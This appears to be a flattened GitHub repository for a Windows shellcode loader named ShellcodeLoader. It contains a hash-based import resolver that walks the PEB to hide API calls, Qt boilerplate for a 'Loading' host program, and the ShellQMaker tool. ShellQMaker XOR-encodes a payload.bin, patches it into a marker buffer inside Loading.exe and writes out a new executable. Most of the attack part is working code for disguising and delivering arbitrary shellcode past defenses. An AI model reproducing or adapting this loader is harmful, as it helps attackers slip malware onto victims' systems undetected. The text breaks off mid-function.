hash_forwarded( 313 | const char* str, unsigned offset) noexcept 314 | { 315 | forwarded_hashes res{ offset, offset }; 316 | 317 | for(; *str != '.'; ++str) 318 | res.module_hash = hash_single(res.module_hash, *str); 319 | 320 | ++str; 321 | 322 | for(; *str; ++str) 323 | res.function_hash = hash_single(res.function_hash, *str); 324 | 325 | return res; 326 | } 327 | 328 | // some helper functions 329 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept 330 | { 331 | #if defined(_M_X64) || defined(__amd64__) 332 | return reinterpret_cast(__readgsqword(0x60)); 333 | #elif defined(_M_IX86) || defined(__i386__) 334 | return reinterpret_cast(__readfsdword(0x30)); 335 | #elif defined(_M_ARM) || defined(__arm__) 336 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30); 337 | #elif defined(_M_ARM64) || defined(__aarch64__) 338 | return *reinterpret_cast(__getReg(18) + 0x60); 339 | #elif defined(_M_IA64) || defined(__ia64__) 340 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60); 341 | #else 342 | #error Unsupported platform. Open an issue and I'll probably add support. 343 | #endif 344 | } 345 | 346 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr() 347 | { 348 | return reinterpret_cast(peb()->Ldr); 349 | } 350 | 351 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers( 352 | const char* base) noexcept 353 | { 354 | return reinterpret_cast( 355 | base + reinterpret_cast(base)->e_lfanew); 356 | } 357 | 358 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir( 359 | const char* base) noexcept 360 | { 361 | return reinterpret_cast( 362 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress); 363 | } 364 | 365 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept 366 | { 367 | return reinterpret_cast( 368 | ldr()->InLoadOrderModuleList.Flink); 369 | } 370 | 371 | struct exports_directory { 372 | const char* _base; 373 | const win::IMAGE_EXPORT_DIRECTORY* _ied; 374 | unsigned long _ied_size; 375 | 376 | public: 377 | using size_type = unsigned long; 378 | 379 | LAZY_IMPORTER_FORCEINLINE 380 | exports_directory(const char* base) noexcept : _base(base) 381 | { 382 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0]; 383 | _ied = reinterpret_cast( 384 | base + ied_data_dir.VirtualAddress); 385 | _ied_size = ied_data_dir.Size; 386 | } 387 | 388 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept 389 | { 390 | return reinterpret_cast(_ied) != _base; 391 | } 392 | 393 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept 394 | { 395 | return _ied->NumberOfNames; 396 | } 397 | 398 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; } 399 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept 400 | { 401 | return _ied; 402 | } 403 | 404 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept 405 | { 406 | return reinterpret_cast( 407 | _base + reinterpret_cast( 408 | _base + _ied->AddressOfNames)[index]); 409 | } 410 | 411 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept 412 | { 413 | const auto* const rva_table = 414 | reinterpret_cast(_base + _ied->AddressOfFunctions); 415 | 416 | const auto* const ord_table = reinterpret_cast( 417 | _base + _ied->AddressOfNameOrdinals); 418 | 419 | return _base + rva_table[ord_table[index]]; 420 | } 421 | 422 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded( 423 | const char* export_address) const noexcept 424 | { 425 | const auto ui_ied = reinterpret_cast(_ied); 426 | return (export_address > ui_ied && export_address < ui_ied + _ied_size); 427 | } 428 | }; 429 | 430 | struct safe_module_enumerator { 431 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T; 432 | value_type* value; 433 | value_type* head; 434 | 435 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept 436 | : safe_module_enumerator(ldr_data_entry()) 437 | {} 438 | 439 | LAZY_IMPORTER_FORCEINLINE 440 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept 441 | : value(ldr->load_order_next()), head(value) 442 | {} 443 | 444 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept 445 | { 446 | value = head->load_order_next(); 447 | } 448 | 449 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 450 | { 451 | value = value->load_order_next(); 452 | 453 | return value != head && value->DllBase; 454 | } 455 | }; 456 | 457 | struct unsafe_module_enumerator { 458 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*; 459 | value_type value; 460 | 461 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept 462 | : value(ldr_data_entry()) 463 | {} 464 | 465 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); } 466 | 467 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 468 | { 469 | value = value->load_order_next(); 470 | return true; 471 | } 472 | }; 473 | 474 | // provides the cached functions which use Derive classes methods 475 | template 476 | class lazy_base { 477 | protected: 478 | // This function is needed because every templated function 479 | // with different args has its own static buffer 480 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept 481 | { 482 | static void* value = nullptr; 483 | return value; 484 | } 485 | 486 | public: 487 | template 488 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept 489 | { 490 | return Derived::template get(); 491 | } 492 | 493 | template 494 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept 495 | { 496 | auto& cached = _cache(); 497 | if(!cached) 498 | cached = Derived::template get(); 499 | 500 | return (T)(cached); 501 | } 502 | 503 | template 504 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept 505 | { 506 | return cached(); 507 | } 508 | }; 509 | 510 | template 511 | struct lazy_module : lazy_base> { 512 | template 513 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept 514 | { 515 | Enum e; 516 | do { 517 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 518 | return (T)(e.value->DllBase); 519 | } while(e.next()); 520 | return {}; 521 | } 522 | 523 | template 524 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept 525 | { 526 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr)); 527 | do { 528 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 529 | return (T)(e.value->DllBase); 530 | } while(e.next()); 531 | return {}; 532 | } 533 | 534 | template 535 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept 536 | { 537 | auto& cached = lazy_base>::_cache(); 538 | if(!cached) 539 | cached = in(ldr); 540 | 541 | return (T)(cached); 542 | } 543 | }; 544 | 545 | template 546 | struct lazy_function : lazy_base, T> { 547 | using base_type = lazy_base, T>; 548 | 549 | template 550 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const 551 | { 552 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS 553 | return get()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 554 | #else 555 | return this->cached()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 556 | #endif 557 | } 558 | 559 | template 560 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept 561 | { 562 | // for backwards compatability. 563 | // Before 2.0 it was only possible to resolve forwarded exports when 564 | // this macro was enabled 565 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 566 | return forwarded(); 567 | #else 568 | 569 | Enum e; 570 | 571 | do { 572 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS 573 | if(!e.value->DllBase || !e.value->FullDllName.Length) 574 | continue; 575 | #endif 576 | 577 | const exports_directory exports(e.value->DllBase); 578 | 579 | if(exports) { 580 | auto export_index = exports.size(); 581 | while(export_index--) 582 | if(hash(exports.name(export_index), get_offset(OHP)) == get_hash(OHP)) 583 | return (F)(exports.address(export_index)); 584 | } 585 | } while(e.next()); 586 | return {}; 587 | #endif 588 | } 589 | 590 | template 591 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept 592 | { 593 | detail::win::UNICODE_STRING_T name; 594 | forwarded_hashes hashes{ 0, get_hash(OHP) }; 595 | 596 | Enum e; 597 | do { 598 | name = e.value->BaseDllName; 599 | name.Length -= 8; // get rid of .dll extension 600 | 601 | if(!hashes.module_hash || hash(name, get_offset(OHP)) == hashes.module_hash) { 602 | const exports_directory exports(e.value->DllBase); 603 | 604 | if(exports) { 605 | auto export_index = exports.size(); 606 | while(export_index--) 607 | if(hash(exports.name(export_index), get_offset(OHP)) == hashes.function_hash) { 608 | const auto addr = exports.address(export_index); 609 | 610 | if(exports.is_forwarded(addr)) { 611 | hashes = hash_forwarded( 612 | reinterpret_cast(addr), 613 | get_offset(OHP)); 614 | 615 | e.reset(); 616 | break; 617 | } 618 | return (F)(addr); 619 | } 620 | } 621 | } 622 | } while(e.next()); 623 | return {}; 624 | } 625 | 626 | template 627 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept 628 | { 629 | return forwarded(); 630 | } 631 | 632 | template 633 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept 634 | { 635 | auto& value = base_type::_cache(); 636 | if(!value) 637 | value = forwarded(); 638 | return (F)(value); 639 | } 640 | 641 | template 642 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept 643 | { 644 | return forwarded_cached(); 645 | } 646 | 647 | template 648 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept 649 | { 650 | if(IsSafe && !m) 651 | return {}; 652 | 653 | const exports_directory exports((const char*)(m)); 654 | if(IsSafe && !exports) 655 | return {}; 656 | 657 | for(unsigned long i{};; ++i) { 658 | if(IsSafe && i == exports.size()) 659 | break; 660 | 661 | if(hash(exports.name(i), get_offset(OHP)) == get_hash(OHP)) 662 | return (F)(exports.address(i)); 663 | } 664 | return {}; 665 | } 666 | 667 | template 668 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept 669 | { 670 | return in(m); 671 | } 672 | 673 | template 674 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept 675 | { 676 | auto& value = base_type::_cache(); 677 | if(!value) 678 | value = in(m); 679 | return (F)(value); 680 | } 681 | 682 | template 683 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept 684 | { 685 | return in_cached(m); 686 | } 687 | 688 | template 689 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept 690 | { 691 | return in(ldr_data_entry()->load_order_next()->DllBase); 692 | } 693 | 694 | template 695 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept 696 | { 697 | return in_safe(ldr_data_entry()->load_order_next()->DllBase); 698 | } 699 | 700 | template 701 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept 702 | { 703 | return in_cached(ldr_data_entry()->load_order_next()->DllBase); 704 | } 705 | 706 | template 707 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept 708 | { 709 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase); 710 | } 711 | }; 712 | 713 | }} // namespace li::detail 714 | 715 | #endif // include guard 716 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | QApplication a(argc, argv); 7 | Loading w; 8 | w.show(); 9 | return a.exec(); 10 | } 11 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/moc/moc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Meta object code from reading C++ file 'Loading.h' 3 | ** 4 | ** Created by: The Qt Meta Object Compiler version 67 (Qt 5.12.9) 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #include "../../Loading.h" 10 | #include 11 | #include 12 | #if !defined(Q_MOC_OUTPUT_REVISION) 13 | #error "The header file 'Loading.h' doesn't include ." 14 | #elif Q_MOC_OUTPUT_REVISION != 67 15 | #error "This file was generated using the moc from 5.12.9. It" 16 | #error "cannot be used with the include files from this version of Qt." 17 | #error "(The moc has changed too much.)" 18 | #endif 19 | 20 | QT_BEGIN_MOC_NAMESPACE 21 | QT_WARNING_PUSH 22 | QT_WARNING_DISABLE_DEPRECATED 23 | struct qt_meta_stringdata_Loading_t { 24 | QByteArrayData data[1]; 25 | char stringdata0[8]; 26 | }; 27 | #define QT_MOC_LITERAL(idx, ofs, len) \ 28 | Q_STATIC_BYTE_ARRAY_DATA_HEADER_INITIALIZER_WITH_OFFSET(len, \ 29 | qptrdiff(offsetof(qt_meta_stringdata_Loading_t, stringdata0) + ofs \ 30 | - idx * sizeof(QByteArrayData)) \ 31 | ) 32 | static const qt_meta_stringdata_Loading_t qt_meta_stringdata_Loading = { 33 | { 34 | QT_MOC_LITERAL(0, 0, 7) // "Loading" 35 | 36 | }, 37 | "Loading" 38 | }; 39 | #undef QT_MOC_LITERAL 40 | 41 | static const uint qt_meta_data_Loading[] = { 42 | 43 | // content: 44 | 8, // revision 45 | 0, // classname 46 | 0, 0, // classinfo 47 | 0, 0, // methods 48 | 0, 0, // properties 49 | 0, 0, // enums/sets 50 | 0, 0, // constructors 51 | 0, // flags 52 | 0, // signalCount 53 | 54 | 0 // eod 55 | }; 56 | 57 | void Loading::qt_static_metacall(QObject *_o, QMetaObject::Call _c, int _id, void **_a) 58 | { 59 | Q_UNUSED(_o); 60 | Q_UNUSED(_id); 61 | Q_UNUSED(_c); 62 | Q_UNUSED(_a); 63 | } 64 | 65 | QT_INIT_METAOBJECT const QMetaObject Loading::staticMetaObject = { { 66 | &QMainWindow::staticMetaObject, 67 | qt_meta_stringdata_Loading.data, 68 | qt_meta_data_Loading, 69 | qt_static_metacall, 70 | nullptr, 71 | nullptr 72 | } }; 73 | 74 | 75 | const QMetaObject *Loading::metaObject() const 76 | { 77 | return QObject::d_ptr->metaObject ? QObject::d_ptr->dynamicMetaObject() : &staticMetaObject; 78 | } 79 | 80 | void *Loading::qt_metacast(const char *_clname) 81 | { 82 | if (!_clname) return nullptr; 83 | if (!strcmp(_clname, qt_meta_stringdata_Loading.stringdata0)) 84 | return static_cast(this); 85 | return QMainWindow::qt_metacast(_clname); 86 | } 87 | 88 | int Loading::qt_metacall(QMetaObject::Call _c, int _id, void **_a) 89 | { 90 | _id = QMainWindow::qt_metacall(_c, _id, _a); 91 | return _id; 92 | } 93 | QT_WARNING_POP 94 | QT_END_MOC_NAMESPACE 95 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/rcc/qrc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Resource object code 3 | ** 4 | ** Created by: The Resource Compiler for Qt version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #ifdef QT_NAMESPACE 10 | # define QT_RCC_PREPEND_NAMESPACE(name) ::QT_NAMESPACE::name 11 | # define QT_RCC_MANGLE_NAMESPACE0(x) x 12 | # define QT_RCC_MANGLE_NAMESPACE1(a, b) a##_##b 13 | # define QT_RCC_MANGLE_NAMESPACE2(a, b) QT_RCC_MANGLE_NAMESPACE1(a,b) 14 | # define QT_RCC_MANGLE_NAMESPACE(name) QT_RCC_MANGLE_NAMESPACE2( \ 15 | QT_RCC_MANGLE_NAMESPACE0(name), QT_RCC_MANGLE_NAMESPACE0(QT_NAMESPACE)) 16 | #else 17 | # define QT_RCC_PREPEND_NAMESPACE(name) name 18 | # define QT_RCC_MANGLE_NAMESPACE(name) name 19 | #endif 20 | 21 | #ifdef QT_NAMESPACE 22 | namespace QT_NAMESPACE { 23 | #endif 24 | 25 | #ifdef QT_NAMESPACE 26 | } 27 | #endif 28 | 29 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); 30 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)() 31 | { 32 | return 1; 33 | } 34 | 35 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); 36 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)() 37 | { 38 | return 1; 39 | } 40 | 41 | namespace { 42 | struct initializer { 43 | initializer() { QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); } 44 | ~initializer() { QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); } 45 | } dummy; 46 | } 47 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/uic/ui_Loading.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | ** Form generated from reading UI file 'Loading.ui' 3 | ** 4 | ** Created by: Qt User Interface Compiler version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost when recompiling UI file! 7 | ********************************************************************************/ 8 | 9 | #ifndef UI_LOADING_H 10 | #define UI_LOADING_H 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | QT_BEGIN_NAMESPACE 21 | 22 | class Ui_LoadingClass 23 | { 24 | public: 25 | QMenuBar *menuBar; 26 | QToolBar *mainToolBar; 27 | QWidget *centralWidget; 28 | QStatusBar *statusBar; 29 | 30 | void setupUi(QMainWindow *LoadingClass) 31 | { 32 | if (LoadingClass->objectName().isEmpty()) 33 | LoadingClass->setObjectName(QString::fromUtf8("LoadingClass")); 34 | LoadingClass->resize(600, 400); 35 | menuBar = new QMenuBar(LoadingClass); 36 | menuBar->setObjectName(QString::fromUtf8("menuBar")); 37 | LoadingClass->setMenuBar(menuBar); 38 | mainToolBar = new QToolBar(LoadingClass); 39 | mainToolBar->setObjectName(QString::fromUtf8("mainToolBar")); 40 | LoadingClass->addToolBar(mainToolBar); 41 | centralWidget = new QWidget(LoadingClass); 42 | centralWidget->setObjectName(QString::fromUtf8("centralWidget")); 43 | LoadingClass->setCentralWidget(centralWidget); 44 | statusBar = new QStatusBar(LoadingClass); 45 | statusBar->setObjectName(QString::fromUtf8("statusBar")); 46 | LoadingClass->setStatusBar(statusBar); 47 | 48 | retranslateUi(LoadingClass); 49 | 50 | QMetaObject::connectSlotsByName(LoadingClass); 51 | } // setupUi 52 | 53 | void retranslateUi(QMainWindow *LoadingClass) 54 | { 55 | LoadingClass->setWindowTitle(QApplication::translate("LoadingClass", "Loading", nullptr)); 56 | } // retranslateUi 57 | 58 | }; 59 | 60 | namespace Ui { 61 | class LoadingClass: public Ui_LoadingClass {}; 62 | } // namespace Ui 63 | 64 | QT_END_NAMESPACE 65 | 66 | #endif // UI_LOADING_H 67 | -------------------------------------------------------------------------------- /Loading_1.2/res/Loading.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Loading_1.2/res/Loading.ico -------------------------------------------------------------------------------- /Readme/Result-01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-01.png -------------------------------------------------------------------------------- /Readme/Result-02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-02.png -------------------------------------------------------------------------------- /Readme/Result-03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-03.png -------------------------------------------------------------------------------- /Readme/Result-04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-04.png -------------------------------------------------------------------------------- /Readme/ShellQMaker-Files-001.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/ShellQMaker-Files-001.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-001.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-001.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-002.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-002.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-003.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-004.png -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33110.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellQMaker", "ShellQMaker.vcxproj", "{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x64.ActiveCfg = Debug|x64 17 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x64.Build.0 = Debug|x64 18 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x86.ActiveCfg = Debug|Win32 19 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x86.Build.0 = Debug|Win32 20 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x64.ActiveCfg = Release|x64 21 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x64.Build.0 = Release|x64 22 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x86.ActiveCfg = Release|Win32 23 | {10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {3C5B6D70-5C1E-4BF8-9DD8-D09F81751392} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker/ShellQMaker.cpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "wx/wxprec.h" 3 | #include 4 | #include "ShellQMaker.h" 5 | 6 | using namespace std; 7 | 8 | 9 | 10 | 11 | int main(int argc, char* argv[], char* envp[]) 12 | { 13 | wxPrintf(" _________.__ .__ .__ ________ _____ __ \r\n"); 14 | wxPrintf(" / _____/| |__ ____ | | | | \\_____ \\ / \\ _____ | | __ ___________ \r\n"); 15 | wxPrintf(" \\_____ \\ | | \\_/ __ \\| | | | / / \\ \\ / \\ / \\__ \\ | |/ // __ \\_ __ \\ \r\n"); 16 | wxPrintf(" / \\| Y \\ ___/| |_| |__/ \\_/. \\/ Y \\/ __ \\| <\\ ___/| | \\/ \r\n"); 17 | wxPrintf("/_______ /|___| /\\___ >____/____/\\_____\\ \\_/\\____|__ (____ /__|_ \\___ >__ | \r\n"); 18 | wxPrintf(" \\/ \\/ \\/ \\__> \\/ \\/ \\/ \\/ \r\n"); 19 | wxPrintf("\n"); 20 | wxPrintf(" ShellQMaker v1.0 | 2023\n\n"); 21 | 22 | if (argc == 3) 23 | { 24 | 25 | FILEINFO shellcode = OpenfileA(argv[1]); 26 | for (int i = 0; i < shellcode.size; i++) 27 | { 28 | shellcode.pbufr[i] = (shellcode.pbufr[i] ^ (i + 1)) + 1; 29 | } 30 | 31 | char loadername[] = "Loading.exe"; 32 | FILEINFO Shellload = OpenfileA(loadername); 33 | //»ñÈ¡LoadingÖÐshellcodeµÄµØÖ· 34 | //char Shellload[]={ 0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,}; 35 | int cnt = 0, offset = 0, num = 0; 36 | while (TRUE) 37 | { 38 | if (Shellload.pbufr[cnt] == 0x41) 39 | { 40 | offset = cnt; 41 | while (Shellload.pbufr[cnt] == 0x41) 42 | { 43 | cnt++; 44 | num++; 45 | if (num > 0x42) 46 | { 47 | break; 48 | } 49 | } 50 | } 51 | if (num > 0x42) 52 | { 53 | break; 54 | } 55 | cnt++; 56 | num = 0, offset = 0; 57 | } 58 | MMcpy(&(Shellload.pbufr[offset]), &(shellcode.size), sizeof(DWORD)); 59 | MMcpy(&(Shellload.pbufr[offset + sizeof(DWORD)]), shellcode.pbufr, shellcode.size); 60 | Writetofile(Shellload.pbufr, Shellload.size, argv[2]); 61 | wxPrintf("\r\n[+] Out ShellFile----->%s\r\n", argv[2]); 62 | 63 | } 64 | else 65 | { 66 | 67 | wxPrintf("[+] usage:\r\n"); 68 | wxPrintf("[+] ShellQMaker.exe \"payload.bin\" \"outfile.exe\" \r\n"); 69 | wxPrintf("[+] example:\r\n"); 70 | wxPrintf("[+] ShellQMaker.exe payload.bin shellcode.exe \r\n"); 71 | } 72 | return 0; 73 | } 74 | -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker/ShellQMaker.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "wx/wxprec.h" 4 | #include 5 | #include 6 | 7 | typedef struct { DWORD size; PBYTE pbufr; }FILEINFO; 8 | FILEINFO OpenfileA(char* ptrFile) 9 | { 10 | DWORD dwReadTotal = 0; 11 | DWORD dwReaded = 0; 12 | FILEINFO fileinfo = { 0 }; 13 | HANDLE hFile = NULL; 14 | hFile = CreateFileA(ptrFile, FILE_SHARE_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 15 | if (hFile == INVALID_HANDLE_VALUE) 16 | goto FAISE; 17 | fileinfo.size = GetFileSize(hFile, NULL); 18 | if (fileinfo.size == 0) 19 | goto FAISE; 20 | fileinfo.pbufr = (byte*)HeapAlloc(GetProcessHeap(), 0, fileinfo.size); 21 | if (fileinfo.pbufr == 0) 22 | goto FAISE; 23 | SecureZeroMemory(fileinfo.pbufr, fileinfo.size); 24 | 25 | while (dwReadTotal < fileinfo.size 26 | && ReadFile(hFile, fileinfo.pbufr + dwReadTotal, fileinfo.size - dwReadTotal, &dwReaded, NULL)) 27 | { 28 | dwReadTotal += dwReaded; 29 | } 30 | FAISE: 31 | if (hFile != INVALID_HANDLE_VALUE) 32 | { 33 | CloseHandle(hFile); 34 | } 35 | return fileinfo; 36 | }; 37 | 38 | void* MMcpy(void* dst, const void* src, size_t len) 39 | { 40 | char* ch_dst = (char*)dst; 41 | char* ch_src = (char*)src; 42 | if (NULL == ch_dst || NULL == ch_src) { 43 | return NULL; 44 | } 45 | 46 | void* rest = ch_dst; 47 | 48 | if (ch_dst <= ch_src || (char*)ch_dst >= (char*)ch_src + len) { 49 | while (len--) { 50 | *(char*)ch_dst = *(char*)ch_src; 51 | ch_dst = (char*)ch_dst + 1; 52 | ch_src = (char*)ch_src + 1; 53 | } 54 | } 55 | else { 56 | ch_src = (char*)ch_src + len - 1; 57 | ch_dst = (char*)ch_dst + len - 1; 58 | while (len--) { 59 | *(char*)ch_dst = *(char*)ch_src; 60 | ch_dst = (char*)ch_dst - 1; 61 | ch_src = (char*)ch_src - 1; 62 | } 63 | } 64 | return rest; 65 | } 66 | 67 | 68 | BOOL Writetofile(PBYTE file, DWORD contentLen, PCHAR path) 69 | { 70 | 71 | HANDLE pFile; 72 | PBYTE tmpBuf = nullptr; 73 | DWORD dwBytesWrite, dwBytesToWrite; 74 | pFile = CreateFileA(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 